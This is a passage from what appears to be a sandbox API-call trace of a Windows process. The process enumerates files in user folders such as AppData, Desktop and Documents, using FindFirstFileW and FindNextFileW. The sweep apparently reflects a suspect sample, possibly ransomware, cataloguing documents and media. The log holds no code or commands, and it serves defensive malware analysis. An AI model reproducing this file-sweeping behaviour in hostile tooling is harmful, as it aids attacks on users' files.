nFileSizeLow=0x115e9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dIvWm9TLzkj.swf", cAlternateFileName="DIVWM9~1.SWF")) returned 1 [0209.946] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf04b65a0, ftCreationTime.dwHighDateTime=0x1d5db74, ftLastAccessTime.dwLowDateTime=0xe5165b20, ftLastAccessTime.dwHighDateTime=0x1d5d9a0, ftLastWriteTime.dwLowDateTime=0xe5165b20, ftLastWriteTime.dwHighDateTime=0x1d5d9a0, nFileSizeHigh=0x0, nFileSizeLow=0x6389, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DnQ7WF.mp4", cAlternateFileName="")) returned 1 [0209.946] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96674590, ftCreationTime.dwHighDateTime=0x1d5dd45, ftLastAccessTime.dwLowDateTime=0xe30aeb50, ftLastAccessTime.dwHighDateTime=0x1d5d84e, ftLastWriteTime.dwLowDateTime=0xe30aeb50, ftLastWriteTime.dwHighDateTime=0x1d5d84e, nFileSizeHigh=0x0, nFileSizeLow=0x2ce4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hBKhvUWd9C_s.mkv", cAlternateFileName="HBKHVU~1.MKV")) returned 1 [0209.946] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e3e8e00, ftCreationTime.dwHighDateTime=0x1d5e5c8, ftLastAccessTime.dwLowDateTime=0x2fd6edb0, ftLastAccessTime.dwHighDateTime=0x1d5e20b, ftLastWriteTime.dwLowDateTime=0x2fd6edb0, ftLastWriteTime.dwHighDateTime=0x1d5e20b, nFileSizeHigh=0x0, nFileSizeLow=0x913f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HLbm2n7XmHD8Lqe.avi", cAlternateFileName="HLBM2N~1.AVI")) returned 1 [0209.946] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x303da940, ftCreationTime.dwHighDateTime=0x1d5e05f, ftLastAccessTime.dwLowDateTime=0x4b9b6a60, ftLastAccessTime.dwHighDateTime=0x1d5e0fa, ftLastWriteTime.dwLowDateTime=0x4b9b6a60, ftLastWriteTime.dwHighDateTime=0x1d5e0fa, nFileSizeHigh=0x0, nFileSizeLow=0x42cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iRXq1ON0Ej9yEAhP.swf", cAlternateFileName="IRXQ1O~1.SWF")) returned 1 [0209.946] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f8a8360, ftCreationTime.dwHighDateTime=0x1d5dd94, ftLastAccessTime.dwLowDateTime=0xe8d8add0, ftLastAccessTime.dwHighDateTime=0x1d5e044, ftLastWriteTime.dwLowDateTime=0xe8d8add0, ftLastWriteTime.dwHighDateTime=0x1d5e044, nFileSizeHigh=0x0, nFileSizeLow=0xf0f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j2myeAitBN1SML.avi", cAlternateFileName="J2MYEA~1.AVI")) returned 1 [0209.946] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3230c6c0, ftCreationTime.dwHighDateTime=0x1d5e6ee, ftLastAccessTime.dwLowDateTime=0x9fff07f0, ftLastAccessTime.dwHighDateTime=0x1d5e344, ftLastWriteTime.dwLowDateTime=0x9fff07f0, ftLastWriteTime.dwHighDateTime=0x1d5e344, nFileSizeHigh=0x0, nFileSizeLow=0x179d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JPzjkROW.mp4", cAlternateFileName="")) returned 1 [0209.946] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6699f00, ftCreationTime.dwHighDateTime=0x1d5e107, ftLastAccessTime.dwLowDateTime=0x78dc9df0, ftLastAccessTime.dwHighDateTime=0x1d5de4d, ftLastWriteTime.dwLowDateTime=0x78dc9df0, ftLastWriteTime.dwHighDateTime=0x1d5de4d, nFileSizeHigh=0x0, nFileSizeLow=0xf896, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kHbbaUBy.mp4", cAlternateFileName="")) returned 1 [0209.946] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f470100, ftCreationTime.dwHighDateTime=0x1d5e7c2, ftLastAccessTime.dwLowDateTime=0x4a448480, ftLastAccessTime.dwHighDateTime=0x1d5da79, ftLastWriteTime.dwLowDateTime=0x4a448480, ftLastWriteTime.dwHighDateTime=0x1d5da79, nFileSizeHigh=0x0, nFileSizeLow=0x6f22, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kQK4q857gBZQpPL7.mkv", cAlternateFileName="KQK4Q8~1.MKV")) returned 1 [0209.947] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b789490, ftCreationTime.dwHighDateTime=0x1d5e1a0, ftLastAccessTime.dwLowDateTime=0xce30ae80, ftLastAccessTime.dwHighDateTime=0x1d5d85e, ftLastWriteTime.dwLowDateTime=0xce30ae80, ftLastWriteTime.dwHighDateTime=0x1d5d85e, nFileSizeHigh=0x0, nFileSizeLow=0x1688b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lxZOp9a3-tLAfUP65SfR.avi", cAlternateFileName="LXZOP9~1.AVI")) returned 1 [0209.947] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d71b150, ftCreationTime.dwHighDateTime=0x1d5dde9, ftLastAccessTime.dwLowDateTime=0x9d72ceb0, ftLastAccessTime.dwHighDateTime=0x1d5dbb8, ftLastWriteTime.dwLowDateTime=0x9d72ceb0, ftLastWriteTime.dwHighDateTime=0x1d5dbb8, nFileSizeHigh=0x0, nFileSizeLow=0x6085, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NH3SLzbW8s.avi", cAlternateFileName="NH3SLZ~1.AVI")) returned 1 [0209.947] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1131f6b0, ftCreationTime.dwHighDateTime=0x1d5e2b6, ftLastAccessTime.dwLowDateTime=0xd0e25c20, ftLastAccessTime.dwHighDateTime=0x1d5dbef, ftLastWriteTime.dwLowDateTime=0xd0e25c20, ftLastWriteTime.dwHighDateTime=0x1d5dbef, nFileSizeHigh=0x0, nFileSizeLow=0x101c6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PISdf6g6Q65B.mkv", cAlternateFileName="PISDF6~1.MKV")) returned 1 [0209.947] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6b146e0, ftCreationTime.dwHighDateTime=0x1d5ddba, ftLastAccessTime.dwLowDateTime=0x5c6097c0, ftLastAccessTime.dwHighDateTime=0x1d5e2e5, ftLastWriteTime.dwLowDateTime=0x5c6097c0, ftLastWriteTime.dwHighDateTime=0x1d5e2e5, nFileSizeHigh=0x0, nFileSizeLow=0x177c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qh988YS dTfW.mkv", cAlternateFileName="QH988Y~1.MKV")) returned 1 [0209.947] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaa850a0, ftCreationTime.dwHighDateTime=0x1d5dd51, ftLastAccessTime.dwLowDateTime=0x20be2840, ftLastAccessTime.dwHighDateTime=0x1d5db74, ftLastWriteTime.dwLowDateTime=0x20be2840, ftLastWriteTime.dwHighDateTime=0x1d5db74, nFileSizeHigh=0x0, nFileSizeLow=0xb150, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qxEZ6rADOXOFsdXLmpW.mp4", cAlternateFileName="QXEZ6R~1.MP4")) returned 1 [0209.947] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc710f80, ftCreationTime.dwHighDateTime=0x1d5e4b4, ftLastAccessTime.dwLowDateTime=0x34ad4930, ftLastAccessTime.dwHighDateTime=0x1d5df7f, ftLastWriteTime.dwLowDateTime=0x34ad4930, ftLastWriteTime.dwHighDateTime=0x1d5df7f, nFileSizeHigh=0x0, nFileSizeLow=0x13cd9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uHOYNb.flv", cAlternateFileName="")) returned 1 [0209.947] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48469520, ftCreationTime.dwHighDateTime=0x1d5e2de, ftLastAccessTime.dwLowDateTime=0x921230b0, ftLastAccessTime.dwHighDateTime=0x1d5dbef, ftLastWriteTime.dwLowDateTime=0x921230b0, ftLastWriteTime.dwHighDateTime=0x1d5dbef, nFileSizeHigh=0x0, nFileSizeLow=0xd5c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="W5G4ZP44yX0Afp.mkv", cAlternateFileName="W5G4ZP~1.MKV")) returned 1 [0209.947] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x362039a0, ftCreationTime.dwHighDateTime=0x1d5e32e, ftLastAccessTime.dwLowDateTime=0x7e85caf0, ftLastAccessTime.dwHighDateTime=0x1d5dd4f, ftLastWriteTime.dwLowDateTime=0x7e85caf0, ftLastWriteTime.dwHighDateTime=0x1d5dd4f, nFileSizeHigh=0x0, nFileSizeLow=0xc6c6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WfbLFIv.flv", cAlternateFileName="")) returned 1 [0209.947] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba599110, ftCreationTime.dwHighDateTime=0x1d5dc64, ftLastAccessTime.dwLowDateTime=0x10ccab90, ftLastAccessTime.dwHighDateTime=0x1d5e7a0, ftLastWriteTime.dwLowDateTime=0x10ccab90, ftLastWriteTime.dwHighDateTime=0x1d5e7a0, nFileSizeHigh=0x0, nFileSizeLow=0x16c78, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x6 Q53u.swf", cAlternateFileName="X6Q53U~1.SWF")) returned 1 [0209.947] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadf9d7f0, ftCreationTime.dwHighDateTime=0x1d5df1f, ftLastAccessTime.dwLowDateTime=0x6d144850, ftLastAccessTime.dwHighDateTime=0x1d5e475, ftLastWriteTime.dwLowDateTime=0x6d144850, ftLastWriteTime.dwHighDateTime=0x1d5e475, nFileSizeHigh=0x0, nFileSizeLow=0x18d5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xh29.mp4", cAlternateFileName="")) returned 1 [0209.947] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84bf0c90, ftCreationTime.dwHighDateTime=0x1d5db99, ftLastAccessTime.dwLowDateTime=0x431e4c90, ftLastAccessTime.dwHighDateTime=0x1d5e67c, ftLastWriteTime.dwLowDateTime=0x431e4c90, ftLastWriteTime.dwHighDateTime=0x1d5e67c, nFileSizeHigh=0x0, nFileSizeLow=0x2a4d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XQMQgugd.swf", cAlternateFileName="")) returned 1 [0209.947] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e915cd0, ftCreationTime.dwHighDateTime=0x1d5e822, ftLastAccessTime.dwLowDateTime=0xfe4ad180, ftLastAccessTime.dwHighDateTime=0x1d5e0bb, ftLastWriteTime.dwLowDateTime=0xfe4ad180, ftLastWriteTime.dwHighDateTime=0x1d5e0bb, nFileSizeHigh=0x0, nFileSizeLow=0x13484, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y6zjlhJWSCzUXZzpeuR.avi", cAlternateFileName="Y6ZJLH~1.AVI")) returned 1 [0209.947] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ab4280, ftCreationTime.dwHighDateTime=0x1d5e54e, ftLastAccessTime.dwLowDateTime=0xfac5f8b0, ftLastAccessTime.dwHighDateTime=0x1d5e2f9, ftLastWriteTime.dwLowDateTime=0xfac5f8b0, ftLastWriteTime.dwHighDateTime=0x1d5e2f9, nFileSizeHigh=0x0, nFileSizeLow=0xe0c9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZXxgGTUDA6xY.swf", cAlternateFileName="ZXXGGT~1.SWF")) returned 1 [0209.947] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ab4280, ftCreationTime.dwHighDateTime=0x1d5e54e, ftLastAccessTime.dwLowDateTime=0xfac5f8b0, ftLastAccessTime.dwHighDateTime=0x1d5e2f9, ftLastWriteTime.dwLowDateTime=0xfac5f8b0, ftLastWriteTime.dwHighDateTime=0x1d5e2f9, nFileSizeHigh=0x0, nFileSizeLow=0xe0c9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZXxgGTUDA6xY.swf", cAlternateFileName="ZXXGGT~1.SWF")) returned 0 [0209.947] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.947] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.947] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.948] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0209.948] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0209.948] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.948] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.948] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.948] PathFindFileNameW (pszPath="") returned="" [0209.948] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.949] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.949] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0209.949] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0209.949] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0209.949] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0 [0209.949] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.949] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.949] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.949] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\") returned="MpV84iMo\\" [0209.949] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0209.949] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.950] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.950] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.950] PathFindFileNameW (pszPath="") returned="" [0209.950] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99640a00, ftCreationTime.dwHighDateTime=0x1d5dfe6, ftLastAccessTime.dwLowDateTime=0x33d261a0, ftLastAccessTime.dwHighDateTime=0x1d5e716, ftLastWriteTime.dwLowDateTime=0x33d261a0, ftLastWriteTime.dwHighDateTime=0x1d5e716, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.953] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99640a00, ftCreationTime.dwHighDateTime=0x1d5dfe6, ftLastAccessTime.dwLowDateTime=0x33d261a0, ftLastAccessTime.dwHighDateTime=0x1d5e716, ftLastWriteTime.dwLowDateTime=0x33d261a0, ftLastWriteTime.dwHighDateTime=0x1d5e716, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.953] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d204c50, ftCreationTime.dwHighDateTime=0x1d5e187, ftLastAccessTime.dwLowDateTime=0x864827e0, ftLastAccessTime.dwHighDateTime=0x1d5e11b, ftLastWriteTime.dwLowDateTime=0x864827e0, ftLastWriteTime.dwHighDateTime=0x1d5e11b, nFileSizeHigh=0x0, nFileSizeLow=0x1861d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4ughhITY.wav", cAlternateFileName="")) returned 1 [0209.953] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d48ffe0, ftCreationTime.dwHighDateTime=0x1d5e37d, ftLastAccessTime.dwLowDateTime=0x64d3fe50, ftLastAccessTime.dwHighDateTime=0x1d5d891, ftLastWriteTime.dwLowDateTime=0x64d3fe50, ftLastWriteTime.dwHighDateTime=0x1d5d891, nFileSizeHigh=0x0, nFileSizeLow=0x790f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6SABy5ii2eGNy.flv", cAlternateFileName="6SABY5~1.FLV")) returned 1 [0209.953] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb000bdd0, ftCreationTime.dwHighDateTime=0x1d5de56, ftLastAccessTime.dwLowDateTime=0x66b7f940, ftLastAccessTime.dwHighDateTime=0x1d5d7d0, ftLastWriteTime.dwLowDateTime=0x66b7f940, ftLastWriteTime.dwHighDateTime=0x1d5d7d0, nFileSizeHigh=0x0, nFileSizeLow=0x8b85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="An4K.flv", cAlternateFileName="")) returned 1 [0209.953] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ba9e3f0, ftCreationTime.dwHighDateTime=0x1d5deeb, ftLastAccessTime.dwLowDateTime=0x1b0553b0, ftLastAccessTime.dwHighDateTime=0x1d5dd4a, ftLastWriteTime.dwLowDateTime=0x1b0553b0, ftLastWriteTime.dwHighDateTime=0x1d5dd4a, nFileSizeHigh=0x0, nFileSizeLow=0x177ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eZq7CG3P6aq4buI.pdf", cAlternateFileName="EZQ7CG~1.PDF")) returned 1 [0209.953] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd046360, ftCreationTime.dwHighDateTime=0x1d5d9bf, ftLastAccessTime.dwLowDateTime=0x3768f4f0, ftLastAccessTime.dwHighDateTime=0x1d5e3ec, ftLastWriteTime.dwLowDateTime=0x3768f4f0, ftLastWriteTime.dwHighDateTime=0x1d5e3ec, nFileSizeHigh=0x0, nFileSizeLow=0x13521, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G6UpGZI.odp", cAlternateFileName="")) returned 1 [0209.953] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21adfa60, ftCreationTime.dwHighDateTime=0x1d5e744, ftLastAccessTime.dwLowDateTime=0xd7ef1f90, ftLastAccessTime.dwHighDateTime=0x1d5e17a, ftLastWriteTime.dwLowDateTime=0xd7ef1f90, ftLastWriteTime.dwHighDateTime=0x1d5e17a, nFileSizeHigh=0x0, nFileSizeLow=0x7dee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="I5l8lCVAIclu7_.png", cAlternateFileName="I5L8LC~1.PNG")) returned 1 [0209.953] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaf37a00, ftCreationTime.dwHighDateTime=0x1d5e66a, ftLastAccessTime.dwLowDateTime=0xc37b0890, ftLastAccessTime.dwHighDateTime=0x1d5e340, ftLastWriteTime.dwLowDateTime=0xc37b0890, ftLastWriteTime.dwHighDateTime=0x1d5e340, nFileSizeHigh=0x0, nFileSizeLow=0xc6cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jcQVKTVKQ_mh-VfA.docx", cAlternateFileName="JCQVKT~1.DOC")) returned 1 [0209.953] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a324520, ftCreationTime.dwHighDateTime=0x1d5e512, ftLastAccessTime.dwLowDateTime=0x5c7a59e0, ftLastAccessTime.dwHighDateTime=0x1d5deca, ftLastWriteTime.dwLowDateTime=0x5c7a59e0, ftLastWriteTime.dwHighDateTime=0x1d5deca, nFileSizeHigh=0x0, nFileSizeLow=0x17d32, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="krTqwdJtX5sPV.wav", cAlternateFileName="KRTQWD~1.WAV")) returned 1 [0209.953] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a324520, ftCreationTime.dwHighDateTime=0x1d5e512, ftLastAccessTime.dwLowDateTime=0x5c7a59e0, ftLastAccessTime.dwHighDateTime=0x1d5deca, ftLastWriteTime.dwLowDateTime=0x5c7a59e0, ftLastWriteTime.dwHighDateTime=0x1d5deca, nFileSizeHigh=0x0, nFileSizeLow=0x17d32, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="krTqwdJtX5sPV.wav", cAlternateFileName="KRTQWD~1.WAV")) returned 0 [0209.953] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.954] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.954] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="My Music\\" [0209.954] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0209.954] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.954] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.954] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.954] PathFindFileNameW (pszPath="") returned="" [0209.954] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a324520, ftCreationTime.dwHighDateTime=0x1d5e512, ftLastAccessTime.dwLowDateTime=0x5c7a59e0, ftLastAccessTime.dwHighDateTime=0x1d5deca, ftLastWriteTime.dwLowDateTime=0x5c7a59e0, ftLastWriteTime.dwHighDateTime=0x1d5deca, 